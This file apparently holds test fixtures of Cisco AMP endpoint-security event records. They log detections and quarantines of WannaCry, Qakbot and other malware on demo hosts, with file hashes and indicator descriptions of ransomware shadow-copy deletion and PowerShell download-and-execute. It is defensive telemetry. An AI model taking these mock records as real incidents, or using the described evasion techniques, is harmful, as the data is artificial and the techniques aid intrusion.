+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":879000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":879000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":847000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":847000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583840597369422000,"timestamp":1610621973,"timestamp_nanoseconds":231000000,"date":"2021-01-14T10:59:33+00:00","event_type":"Malicious Activity Detection","event_type_id":1090519105,"detection":"W32.MAP.Ransomware.rewrite","detection_id":"6583840593074454529","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mscorsvw.exe","file_path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0","sha1":"c78f4c22dd195a1791472a2c271a0c85b53900d9","md5":"75a758a0c5cea48c9922d64a113d0f9d"},"parent":{"process_id":480,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536","sha1":"ff658a36899e43fec3966d608b4aa4472de7a378","md5":"71c85477df9347fe8e7bc55768473fca"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6701398782847286000,"timestamp":1610621970,"timestamp_nanoseconds":182000000,"date":"2021-01-14T10:59:30+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621970,"start_date":"2021-01-14T10:59:30+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"file:///C%3A/Windows/SysWOW64/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Malicious","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136036637603000,"timestamp":1610621707,"timestamp_nanoseconds":260000000,"date":"2021-01-14T10:55:07+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621707,"start_date":"2021-01-14T10:55:07+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"file:///C%3A/Windows/system32/cmd.exe","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"},"parent":{"disposition":"Clean","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066250000100,"timestamp":1610621237,"timestamp_nanoseconds":250000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066228000300,"timestamp":1610621237,"timestamp_nanoseconds":228000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837","sha1":"128aa78059540cf0cdae2a3cea30cd80e00f2046","md5":"c877b67a5733c59d0d8ed8d519df0c91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533243623469744000,"timestamp":1610619329,"timestamp_nanoseconds":596000000,"date":"2021-01-14T10:15:29+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT657.tmp","file_path":"\\\\?\\C:\\BIT657.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"SqGGuYXyy.exe","file_path":"\\\\?\\C:\\SqGGuYXyy.exe","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT4BBF.tmp","file_path":"\\\\?\\C:\\BIT4BBF.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739875754000,"timestamp":1610618750,"timestamp_nanoseconds":875739000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.","short_description":"W32.WScriptExecuteFakeExtension.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} 